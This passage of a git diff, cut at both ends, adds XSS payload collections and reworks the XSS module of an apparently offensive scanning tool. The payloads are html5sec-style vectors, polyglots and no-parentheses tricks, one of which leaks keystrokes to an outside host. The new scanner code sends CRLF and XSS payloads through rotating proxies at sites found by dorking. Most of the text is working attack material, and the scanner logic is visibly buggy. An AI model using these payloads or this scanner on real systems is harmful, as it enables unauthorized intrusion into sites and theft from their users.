+<! foo="><script>alert(91)</script>"> +</ foo="><script>alert(91)</script>"> +<? foo="><x foo='?><script>alert(91)</script>'>"> +<! foo="[[[x]]"><x foo="]foo><script>alert(91)</script>"> +<% foo><x foo="%><script>alert(91)</script>">//["'`-->]]>]</div> +<div id="92"><div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div><div id="93"><div style="list-style:url(http://foo.f)\20url(javascript:alert(93));">X</div>//["'`-->]]>]</div> +<div id="94"><svg xmlns="http://www.w3.org/2000/svg"> +<handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(94)</handler> +</svg>//["'`-->]]>]</div> +<div id="95"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> +<feImage><set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/></feImage> +</svg>//["'`-->]]>]</div> +<div id="96"><iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe> +<iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>//["'`-->]]>]</div> +<div id="97"><!-- IE 5-9 --> +<div id=d><x xmlns="><iframe onload=alert(97)"></div> +<script>d.innerHTML+='';</script> +<!-- IE 10 in IE5-9 Standards mode --> +<div id=d><x xmlns='"><iframe onload=alert(2)//'></div> +<script>d.innerHTML+='';</script>//["'`-->]]>]</div> +<div id="98"><div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div> +<script>with(document.getElementById("d"))innerHTML=innerHTML</script>//["'`-->]]>]</div> +<div id="99">XXX<style> +*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */ +<!-- +--><!--*{color:red} /* all UA */ +*{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */ +</style>//["'`-->]]>]</div> +<div id="100"><img[a][b]src=x[d]onerror[c]=[e]"alert(100)">//["'`-->]]>]</div><div id="101"><a href="[a]java[b]script[c]:alert(101)">XXX</a>//["'`-->]]>]</div><div id="102"><img src="x` `<script>alert(102)</script>"` `>//["'`-->]]>]</div><div id="103"><script>history.pushState(0,0,'/i/am/somewhere_else');</script>//["'`-->]]>]</div> +<div id="104"><svg xmlns="http://www.w3.org/2000/svg" id="foo"> +<x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(104) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/> +</svg>//["'`-->]]>]</div> +<div id="105"><iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>//["'`-->]]>]</div><div id="106"><img src onerror /" '"= alt=alert(106)//">//["'`-->]]>]</div><div id="107"><title onpropertychange=alert(107)></title><title title=></title>//["'`-->]]>]</div> +<div id="108"><!-- IE 5-8 standards mode --> +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(108)></a>"> +<!-- IE 5-9 standards mode --> +<!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//"> +<?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">//["'`-->]]>]</div> +<div id="109"><svg xmlns="http://www.w3.org/2000/svg"> +<a id="x"><rect fill="white" width="1000" height="1000"/></a> +<rect fill="white" style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);"/> +</svg>//["'`-->]]>]</div> +<div id="110"><svg xmlns="http://www.w3.org/2000/svg"> +<path d="M0,0" style="marker-start:url(test4.svg#a)"/> +</svg>//["'`-->]]>]</div> +<div id="111"><div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div><div id="112"><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div> +<div id="113"><div id="x">XXX</div> +<style>#x{font-family:foo[bar;color:green;}#y];color:red;{}</style>//["'`-->]]>]</div> +<div id="114"><x style="background:url('x[a];color:red;/*')">XXX</x>//["'`-->]]>]</div> +<div id="115"><!--[if]><script>alert(115)</script --> +<!--[if<img src=x onerror=alert(2)//]> -->//["'`-->]]>]</div> +<div id="116"><div id="x">x</div> +<xml:namespace prefix="t"> +<import namespace="t" implementation="#default#time2"> +<t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=alert(116)&gt;">//["'`-->]]>]</div> +<div id="117"><a href="http://attacker.org"> +<iframe src="http://example.org/"></iframe> +</a>//["'`-->]]>]</div> +<div id="118"><div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');"><h1>Drop me</h1></div> +<iframe src="http://www.example.org/dropHere.html"></iframe>//["'`-->]]>]</div> +<div id="119"><iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe> +<textarea type="text" cols="50" rows="10"></textarea>//["'`-->]]>]</div> +<div id="120"><script>function makePopups(){for (i=1;i<6;i++) {window.open('popup.html','spam'+i,'width=50,height=50');}}</script> +<body><a href="#" onclick="makePopups()">Spam</a>//["'`-->]]>]</div> +<div id="121"><html xmlns="http://www.w3.org/1999/xhtml" +xmlns:svg="http://www.w3.org/2000/svg"> +<body style="background:gray"> +<iframe src="http://example.com/" style="width:800px; height:350px; border:none; mask: url(#maskForClickjacking);"/> +<svg:svg><svg:mask id="maskForClickjacking" maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox"><svg:rect x="0.0" y="0.0" width="0.373" height="0.3" fill="white"/><svg:circle cx="0.45" cy="0.7" r="0.075" fill="white"/></svg:mask></svg:svg></body> +</html>//["'`-->]]>]</div> +<div id="122"><iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>//["'`-->]]>]</div> +<div id="123"><span class=foo>Some text</span> +<a class=bar href="http://www.example.org">www.example.org</a> +<script src="http://code.jquery.com/jquery-1.4.4.js"></script> +<script>$("span.foo").click(function() {alert('foo');$("a.bar").click();});$("a.bar").click(function() {alert('bar');location="http://html5sec.org";});</script>//["'`-->]]>]</div> +<div id="124"><script src="/\example.com\foo.js"></script> // Safari 5.0, Chrome 9, 10 +<script src="\\example.com\foo.js"></script> // Safari 5.0//["'`-->]]>]</div> +<div id="125"><?xml version="1.0"?> +<?xml-stylesheet type="text/xml" href="#stylesheet"?> +<!DOCTYPE doc [ +<!ATTLIST xsl:stylesheet id ID #REQUIRED>]> +<svg xmlns="http://www.w3.org/2000/svg"> +<xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"><iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(125)"></iframe> </xsl:template></xsl:stylesheet><circle fill="red" r="40"></circle></svg>//["'`-->]]>]</div> +<div id="126"><object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> +<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(126)" style="behavior:url(#x);"><param name=postdomevents /></object>//["'`-->]]>]</div> +<div id="127"><svg xmlns="http://www.w3.org/2000/svg" id="x"> +<listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/> +<handler id="y">alert(127)</handler> +</svg>//["'`-->]]>]</div> +<div id="128"><svg><style>&lt;img/src=x onerror=alert(128)// </b>//["'`-->]]>]</div> +<div id="129"><svg> +<image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(129)</script></svg>")'> +</svg>//["'`-->]]>]</div> +<div id="130"><math href="javascript:alert(130)">CLICKME</math> +<math> +<maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction> +<maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction> +</math>//["'`-->]]>]</div> +<div id="131"><b>drag and drop one of the following strings to the drop box:</b> +<br/><hr/>jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/> +feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/> +feed:data:text/html,&#x3c;script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)&#x3c;/script>&#x3c;b> +<br/><hr/>feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/> +<div id="dropbox" style="height: 360px;width: 500px;border: 5px solid #000;position: relative;" ondragover="event.preventDefault()">+ Drop Box +</div>//["'`-->]]>]</div> +<div id="132"><!doctype html> +<form> +<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label> +<br> +<input name="secret" type="password"> +</form> +<!-- injection --><svg height="50px"> +<image xmlns:xlink="http://www.w3.org/1999/xlink"> +<set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" /> +<set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" /> +<set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" /> +<set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" /> +</image> +</svg>//["'`-->]]>]</div> +<div id="133"><!-- `<img/src=xx:xx onerror=alert(133)//--!>//["'`-->]]>]</div> +<div id="134"><xmp> +<% +</xmp> +<img alt='%></xmp><img src=xx:x onerror=aler +*{color:red}</style>//["'`-->]]>]</div> +<div id="135"><?xml-stylesheet type="text/xsl" href="#" ?> +<stylesheet xmlns="http://www.w3.org/TR/WD-xsl"> +<template match="/"> +<eval>new ActiveXObject(&apos;htmlfile&apos;).parentWindow.alert(135)</eval> +<if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if> +</template> +</stylesheet>//["'`-->]]>]</div> +<div id="136"><form action="" method="post"> +<input name="username" value="admin" /> +<input name="password" type="password" value="secret" /> +<input name="injected" value="injected" dirname="password" /> +<input type="submit"> +</form>//["'`-->]]>]</div> +<div id="137"><svg> +<a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?"> +<circle r="400"></circle> +<animate attributeName="xlink:href" begin="0" from="javascript:alert(137)" to="&" /> +</a>//["'`-->]]>]</div> +<div id="138"><link rel="import" href="test.svg" />//["'`-->]]>]</div><div id="139"><iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;" />//["'`-->]]>]</div>undefined +<marquee loop=1 width=0 onfinish=alert(1)> +<marguee/onstart=alert(1)> +<svg onload=(alert)(1)> +<script>$=1,alert($)</script> +<form><button formaction="javascript:alert(1)"> +<div style=xss:expression(alert(1))> +<div style=xss:expression(1)-alert(1)> +<div style=xss:expressio\6e(alert(1))> +<div style=xss:expressio\006e(alert(1))> +<div style=xss:expressio\00006e(alert(1))> +<div style=xss:expressio\6e(alert(1))> +<div style=xss:expressio&#x5c;6e(alert(1))> diff --git a/bounty_drive/attacks/xss/payloads/xss-polyglots.txt b/bounty_drive/attacks/xss/payloads/xss-polyglots.txt new file mode 100644 index 0000000..c8cc176 --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/xss-polyglots.txt @@ -0,0 +1,49 @@ +javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//> +javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//> +javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//> +javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>` +javascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">` +javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/<i<frame */ onload=alert()//</script> +javascript:"/*`/*\"/*'/*</stYle/</titLe/</teXtarEa/</nOscript></noembed></template></script/--><ScRipt>/*<i<frame/*/ onload=alert()//</Script> +javascript:`</template>\"///"//</script/--></title/'</style/</textarea/</noembed/</noscript><<script/>/<frame */; onload=alert()//<</script>` +javascript:`</template>\"///"//</script/--></title/'</style/</textarea/</noembed/</noscript><<script/>/<frame */; onload=alert()//<</script>` +javascript:/*`//'//\"//</style></noscript></script>--></textarea></noembed></template></title><script>/<frame <svg"///*/ onload=alert()//</script> +javascript:/*"//'//`//\"//--></script></title></style></textarea></template></noembed></noscript><script>//<frame/<svg/*/onload= alert()//</script> +javascript:/*-->'//"//`//\"//</title></textarea></style></noscript></script></noembed></template><script>/*<frame/<svg */ onload=alert()//</script> +javascript:/*"/*'/*`/*\"/*</script/</title/</textarea/</style/</noscript></template></noembed>--><script>/*<svg <frame */ onload=alert()//</script> +javascript:/*"/*'/*\"/*`/*--></title></noembed></template></textarea></noscript></style></script><script>//<frame <svg */ onload=alert()//</script> +javascript:/*"/*`/*'/*\"/*--></title></script></textarea></noscript></style></noembed></template><script> /*<svg <frame onload=/**/alert()//</script> +javascript:"/*'//`//\"//</title></template/</textarea/</style/</noscript/</noembed/</script>--><<script>alert()<</script><frame/*/ onload=alert()//> +javascript:alert()"//</title></textarea></style></noscript></noembed></template></script>\"//'//`//--><script>//<svg <frame */onload= alert()//</script> +javascript:/*"/*`/*'/*\"/*</script></style></template></select></title></textarea></noscript></noembed><frame/onload=alert()--><<svg/*/ onload=alert()//> +javascript:"/*`/*\"/*' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert()//--><<sVg/onload=alert``> +javascript:/*--></script></textarea></style></noscript>\"</noembed>[`</template>["</select>['</title>]<<script>///<frame */ onload=alert()//<</script> +javascript:"/*\"/*'/*`/*--></noembed></template></noscript></title></textarea></style></script></select><frame/onload=alert()><<svg/onload= /**/alert()//> +javascript:/*"/*`/*'/*\"/*--></title></textarea></noscript></noembed></template></style></script><<script> /**/alert()//<</script><frame onload=alert()> +javascript:"/*\"/*'/*--></title></textarea></style></noscript></template></noembed></script><<script>/*` /*<frame src=javascript:/**/alert()//><</script> +javascript:"/*'/*\"/*` /**/alert()//--></title></textarea></style></noscript></noembed></template></script><script>alert()</script><svg/<frame/onload=alert()> +javascript:/*"/*`/*'/*\"/*-->*/ alert()//</title></textarea></style></noscript></noembed></template></script></select><frame/onload=alert``><<svg/onload=alert()> +javascript:`/*</title></style></textarea></noscript></script></noembed></template></select/"/'/*--><frame onload=alert()><svg/\"/*<svg onload=' /**/-alert()//'>javascript:/*`/*\"/*'/*</noembed>"/*<frame src=javascript:/**/;alert()//--></title></textarea></style></noscript></template></select></script><<svg/onload= alert()//> +javascript:alert()//"/*`/*'/*\"/*--></title></textarea></noscript></noembed></template></style></script>*/ alert()//<frame onload=alert()><<script>alert()<</script> +javascript:alert()//'//"//\"//-->`//*/ alert();//</title></textarea></style></noscript></noembed></template><frame onload=alert()></select></script><<svg onload=alert()> +javascript:/*"/*\"/*`/*'/**/ (alert())//</title></textarea></style></noscript></script></noembed></template></select><frame src=javascript:alert()--><<svg/onload=alert()> +javascript:/*"/*'/*\"/*`/*><frame src=javascript:alert()></template </textarea </title </style </noscript </noembed </script --><<script>alert()<</script>\ /**/alert()// +javascript:/*`/*'/*'/*"-/*\"/**/ alert()//></title></textarea></style></select></script></noembed></noscript></template>--><<svg/onload=alert()><frame/src=javascript:alert()> +javascript:'/*`/*'/*"/*\"/*<FRAME SRC= javascript:/**/-alert()//--></title></textarea></style></noscript></noembed></template></script><script>//<svg onload= alert()//</script> +javascript:alert()//--></title></style></noscript></noembed></template></select></textarea><frameset onload=alert()></script>*///\"//`//'//"//><svg <svg onload=alert()> alert()// +javascript:alert()//'//"//\"; '/`/*\/*'/*"/**/(alert())//</style></template/</title/</textarea/</noscript/</noembed/</script>--><frame <svg onload=alert()><script>alert()</script> +javascript:/*"/*'/*`/*\"/**/ alert()//*</title></textarea></style></noscript></noembed></template></option></select></SCRIPT>--><<svg onload=alert()><frame src=javascript:alert()> +javascript:alert()//\"//`//'//"//--></style></select></noscript></noembed></template></title></textarea></script><iframe/srcdoc="<svg/onload=alert()>"><frame/onload=alert()>*/ alert()// +javascript:alert()//*-->*`/*'/*"/*\"/*</title></textarea></style></noscript></noembed></template><frame src=javascript:alert()></script><script>/*<svg onload=alert()>*/ alert()//</script> +jaVasCript:/*`/*\`/*'/*\"//"/**/(onload=alert())//<svg/onload=alert()><frame/onload=alert()></select></noscript></noembed></template></stYle/</titLe/</teXtarEa/</script/--><sVg/oNloAd= alert()//> +javascript:alert()//'//"//`//></a></option></select></template></noscript></script></title></style></textarea></noembed>--><<svg onload=alert()>\">alert()//*/ alert()//<frame src=javascript:alert()> +javascript:alert()//\ /*<svg/onload=';alert();'></textarea></style></title></noscript></template></noembed><frame onload=";alert();"></script>--><script>alert`;alert();`</script>*/alert()//\";alert()// +javascript:alert/*`/*\/*'/*\"/*"/**/(alert())// alert()//--></template><frame/onload=alert() <img src=x onerror=alert()></style/</title/</textarea/</noscript/</noembed/</script><script>alert()</script> +javascript:alert();//</title></noscript></noembed></template></style></textarea><frameset onload='+/"/+/[*/[]/+alert()//'-->\" alert();/*`/**/(/**/alert())//<script>alert()</script><<svg onload=alert()>> +javascript:alert()//*/alert()/*'-/"/-eval(`(alert())`)//\"-alert()//--></title></style></noscript></textarea></template></noembed><script>alert()</script><frameset onload=alert()><svg/onload=alert(1)> alert()// +javascript:alert()//\";alert();/*-/*`/*\`/*'/*"/**///--><FRAME SRC="javascript:alert();"></textarea></style></noscript></noembed></template></option></select></script></title><svg/onload=alert()><svg/onload=alert()> alert(1)// +javascript:alert()//<frame/src=javascript:alert()><svg/onload=alert()>`;alert()`';alert()//\";alert();//"//--></title></textarea></style></noscript></noembed></template></option></select></script><svg onload=alert()>*/ alert()//* +javascript:alert()//</title></style></textarea></noscript></template></noembed><script>alert()</script>-->\";alert()//";alert()//';alert()//<script>alert()</script><frame src="javascript:alert()">` alert()//<svg/onload=alert()>*/alert()/* +javascript:alert();//<img src=x:x onerror=alert(1)>\";alert();//";alert();//';alert();//`;alert();// alert();//*/alert();//--></title></textarea></style></noscript></noembed></template></select></script><frame src=javascript:alert()><svg onload=alert()><!-- +javascript:/*--></title></style></template></noscript></noembed></textarea></script><svg/onload='+/"/+/onclick=1/+/[*/[]/+alert()//'>"><svg/onload=`+/"/+/onclick=/+/[*/[]/+alert()//'>"><script>alert()</script><frame src="javascript:alert()"></frameset>+\"; alert()//<img src onerror=alert()> +javascript:alert(1)//\";alert(1);<!--jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//--><FRAME SRC="javascript:alert(1);"></textarea></style></iframe></noscript></noembed></template></option></select></script><img src=x onerror=alert(1)></title><script>alert(1)</script><img src=0 onerror=alert(1)><img src=x:x onerror=alert(1)> alert(1)// \ No newline at end of file diff --git a/bounty_drive/attacks/xss/payloads/xss-without-parentheses-semi-colons-portswigger.txt b/bounty_drive/attacks/xss/payloads/xss-without-parentheses-semi-colons-portswigger.txt new file mode 100644 index 0000000..41b83ee --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/xss-without-parentheses-semi-colons-portswigger.txt @@ -0,0 +1,8 @@ +<script>onerror=alert;throw 1337</script> +<script>{onerror=alert}throw 1337</script> +<script>throw onerror=alert,'some string',123,'haha'</script> +<script>{onerror=eval}throw'=alert\x281337\x29'</script> +<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script> +<script>{onerror=prompt}throw{lineNumber:1,columnNumber:1,fileName:'second argument',message:'first argument'}</script> +<script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script> +<script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script> \ No newline at end of file diff --git a/bounty_drive/attacks/xss/xss.py b/bounty_drive/attacks/xss/xss.py index e7f9cf9..bb85a50 100644 --- a/bounty_drive/attacks/xss/xss.py +++ b/bounty_drive/attacks/xss/xss.py @@ -2,66 +2,189 @@ # XSS Vulnerability testing functions ######################################################################################### import glob +import re import sys +import concurrent.futures import requests from termcolor import cprint from tqdm import tqdm -from utils.app_config import POTENTIAL_PATHS, VULN_PATHS -from utils.request_manager import inject_payload +from utils.proxies import round_robin_proxies from utils.waf_mitigation import waf_detector +from utils.app_config import POTENTIAL_PATHS, VULN_PATHS +from utils.request_manager import inject_params, inject_payload try: from selenium import webdriver from selenium.webdriver.chrome.service import Service from webdriver_manager.chrome import ChromeDriverManager except ImportError: - print("Selenium and webdriver_manager modules not found. Please make sure they are installed.") + print( + "Selenium and webdriver_manager modules not found. Please make sure they are installed." + ) sys.exit(1) + # Load proxies from file def load_xss_payload(): - payloads = {} - for payload_file in glob.glob("payloads/xss/*"): + """_summary_ + TODO manage vulnebility type + Returns: + _type_: _description_ + """ + payloads = [] + for payload_file in glob.glob("attacks/xss/payloads/*"): # Extract the vulnerability type from the filename - vuln_type = payload_file.split('/')[-1].replace('_xss_payload.txt', '') - with open(payload_file, 'r') as file: + with open(payload_file, "r") as file: # Assuming each file may contain multiple payloads, one per line - payloads[vuln_type] = [line.strip() for line in file.readlines()] + payloads.append([line for line in file.readlines()]) return payloads + +def generate_xss_urls(url): + """ + Adds payload to the URL and returns a set of parsed URLs + """ + xss_payloads = load_xss_payload() + injection = "Set-Cookie:nefcore=crlfsuite;" + parsed_urls = set() + verify_param = re.compile(r"=[^?\|&]*") + is_param = verify_param.search(url) + + # Escape characters + escape_chars = [ + "%0d", + "%0a", + "%0d%20", + "%0a%20", + "%3f", + "%0d%0a", + "%23%0d", + "%23%0a", + "%23%0d%0a", + "%u000a", + "%25%30%61", + "%25%30a", + "%3f%0d", + "%3f%0d%0a", + "%3f%0a", + "%%0a0a", + "%u000d", + "%u0000", + "%0d%09", + "%0d%0a%09", + "%0d%0a%20", + "%25250a", + "%250a", + "%2F..%0d%0a", + "%2f%2e%2e%0d%0a", + "%25%30", + "%2e%2e%2f%0d%0a", + "%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D", + "%E5%98%8A%E5%98%8D", + "%e5%98%8a%e5%98%8d%0a", + "%e5%98%8a%e5%98%8d%0d", + "%e5%98%8a%e5%98%8d%0d%0a", + f"\\r", + f"\\r\\n", + f"\\r\\t", + f"\\r\\n\\t", + f"\\r%20", + f"\\r\\n%20", + ] + + # These strings are used before the escape characters + starting_strings = ["", "crlfsuite", "?crlfsuite=", "#", "__session_start__/"] + + if is_param: + del starting_strings[2] + for string in starting_strings: + for each_escape in escape_chars: + injected_urls = inject_params(url, string + each_escape + injection) + for each_injected_url in injected_urls: + parsed_urls.add(each_injected_url) + + for payload in xss_payloads: + _injected = inject_params(url, payload) + for injected in _injected: + parsed_urls.add(injected) + else: + if not url.endswith("/"): + url = url + "/" + else: + None + for string in starting_strings: + for each_escape in escape_chars: + parsed_urls.add(url + string + each_escape + injection) + for payload in xss_payloads: + parsed_urls.add(url + payload) + total_len = len(parsed_urls) + + return parsed_urls, total_len + + +def test_xss_target(url, proxy): + total_parsed_targets = [] + cprint("Intializing Payload Generator...", color="yellow", file=sys.stderr) + parsed_target = generate_xss_urls(url) + for each in parsed_target[0]: + total_parsed_targets.append(each) + + is_waffed = waf_detector(url=url, proxies=proxy) + + if is_waffed: + cprint(f"WAF detected <!>", color="red", file=sys.stderr) + else: + cprint("WAF Status: Offline", color="green", file=sys.stderr) + + for payload_url in total_parsed_targets: + if payload_url in requests.get(payload_url, proxies=proxy).text: + return True, payload_url + else: + return False, payload_url + + def test_vulnerability_xss(proxies): """ Test a list of websites for XSS vulnerability using multithreading and proxies. """ - VULN_PATHS["xss"][1] = [] - - s = Service(ChromeDriverManager().install()) - driver = webdriver.Chrome(service=s) - - XSS_TEST_PAYLOAD = load_xss_payload() if len(POTENTIAL_PATHS["xss"][1]) > 0: - for website in tqdm(POTENTIAL_PATHS["xss"][1], desc=f"Testing for XSS for {website}", unit="site"): - url, _ = website - for payload in XSS_TEST_PAYLOAD: - WAF = waf_detector( - url, {list(params.keys())[0]: xsschecker}, headers, GET, delay, timeout) - if WAF: - cprint(f'WAF detected <!>') - else: - cprint('WAF Status: Offline') - - payload_url = inject_payload(url, payload) - - if payload in requests.get(payload_url).text: - cprint(f"[VULNERABLE] {payload_url}", "red", file=sys.stderr) + proxy_cycle = round_robin_proxies(proxies) + VULN_PATHS["xss"][1] = [] + + # s = Service(ChromeDriverManager().install()) + # driver = webdriver.Chrome(service=s) + + # Now, append a proxy to each task + search_tasks_with_proxy = [] + for website in POTENTIAL_PATHS["xss"][1]: + proxy = next(proxy_cycle) + search_tasks_with_proxy.append({"website": website, "proxy": proxy}) + + with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor: + future_to_search = { + executor.submit( + test_xss_target, task["website"], task["proxy"] + ): website + for task in search_tasks_with_proxy + } + for website in tqdm( + concurrent.futures.as_completed(future_to_search), + desc=f"Testing for XSS for {website}", + unit="site", + ): + result, payload_url = website.result() + if result: VULN_PATHS["xss"][1].append(payload_url) + cprint(f"[VULNERABLE] {payload_url}", "red", file=sys.stderr) else: cprint(f"[NOT VULNERABLE] {payload_url}", "green", file=sys.stderr) - - if VULN_PATHS["xss"][1]: - driver.execute_script("window.open('');") - driver.switch_to.window(driver.window_handles[-1]) - for vulnerable_url in VULN_PATHS["xss"][1]: - driver.get(vulnerable_url) + + # if VULN_PATHS["xss"][1]: + # driver.execute_script("window.open('');") + # driver.switch_to.window(driver.window_handles[-1]) + # for vulnerable_url in VULN_PATHS["xss"][1]: + # driver.get(vulnerable_url) + else: + cprint("No Potential XSS", color="red", file=sys.stderr) diff --git a/bounty_drive/attacks/xss/xss_config.py b/bounty_drive/attacks/xss/xss_config.py index b833626..de07f81 100644 --- a/bounty_drive/attacks/xss/xss_config.py +++ b/bounty_drive/attacks/xss/xss_config.py @@ -2,6 +2,10 @@ XSS_TEST_PAYLOAD = "<script>alert('XSS')</script>" -ENCODE_XSS = False -BLIND_XSS = False -FUZZ_XSS = False \ No newline at end of file +class XSSConfig: + ENCODE_XSS = False + BLIND_XSS = False + FUZZ_XSS = False + + +xss_config = XSSConfig() diff --git a/bounty_drive/bounty_drive.py b/bounty_drive/bounty_drive.py index 965bdeb..4e27497 100755 --- a/bounty_drive/bounty_drive.py +++ b/bounty_drive/bounty_drive.py @@ -1,67 +1,120 @@ -#/usr/bin/python3 +# /usr/bin/python3 import argparse import sys from termcolor import colored, cprint -import terminal_banner -import random import os -import requests -import glob -import time -import threading -import concurrent.futures -import itertools -from tqdm import tqdm -from urllib3.util.retry import Retry -from requests.adapters import HTTPAdapter -from bs4 import BeautifulSoup -from urllib.parse import parse_qs -import urllib.parse as urlparse -import subprocess -import logging -import re -import json - - + + +from attacks.dorks import dorking_config from attacks.dorks.google_dorking import load_google_dorks_and_search -from attacks.sqli.sqli import test_vulnerability_sqli -from attacks.xss.xss import test_vulnerability_xss -from utils.banner import load_animation -from utils.proxies import setup_proxies + from attacks.dorks.github_dorking import * + +from utils.proxies import setup_proxies from utils.app_config import * + +from attacks.xss.xss import test_vulnerability_xss from attacks.xss.xss_config import * + from attacks.sqli.sqli_scan_config import * +from attacks.sqli.sqli import test_vulnerability_sqli + from utils.banner import * +from utils.banner import load_animation from utils.logger import * + import utils.logger -os. system('clear') - +os.system("clear") + ######################################################################################### # Main function -######################################################################################### +######################################################################################### + def get_user_arguments_input(): """ Collect user input for website extension, total output, and starting page number, with default values. """ - parser = argparse.ArgumentParser(description='Collect user input for scanning websites.') - - parser.add_argument('--extension', type=str, default=DEFAULT_EXTENSION, help='Website extension (default: .com)') - parser.add_argument('--subdomain', type=str, default="true", help='Restrict search to subdomain present in target.txt (default: true)') - parser.add_argument('--total_output', type=int, default=DEFAULT_TOTAL_OUTPUT, help='Total number of websites to scan (default: 10)') - parser.add_argument('--page_no', type=int, default=DEFAULT_PAGE_NO, help='Starting page number for Google search (default: 1)') - - parser.add_argument('--do_dorking_google', type=str, default="true", help='Perform Google dorking scan phase (default: true)') - parser.add_argument('--do_dorking_github', type=str, default="true", help='Perform Github dorking scan phase (default: true)') - - parser.add_argument('--do_xss', type=str, default="true", help='Test for XSS vulnerability (default: true)') - parser.add_argument('--do_encode_xss', type=str, default="true", help='Encode XSS payload (default: true)') - parser.add_argument('--do_fuzzing_xss', type=str, default="true", help='Fuzz XSS payload (default: true)') - parser.add_argument('--do_blind_xss', type=str, default="true", help='Test blind XSS payload (default: true)') - - parser.add_argument('--do_sqli', type=str, default="true", help='Test for SQLi vulnerability (default: true)') + parser = argparse.ArgumentParser( + description="Collect user input for scanning websites." + ) + + parser.add_argument( + "--use_proxy", + type=str, + default="true", + help="Restrict search to subdomain present in target.txt (default: true)", + ) + parser.add_argument( + "--extension", + type=str, + default=DEFAULT_EXTENSION, + help="Website extension (default: .com)", + ) + parser.add_argument( + "--subdomain", + type=str, + default="true", + help="Restrict search to subdomain present in target.txt (default: true)", + ) + parser.add_argument( + "--total_output", + type=int, + default=DEFAULT_TOTAL_OUTPUT, + help="Total number of websites to 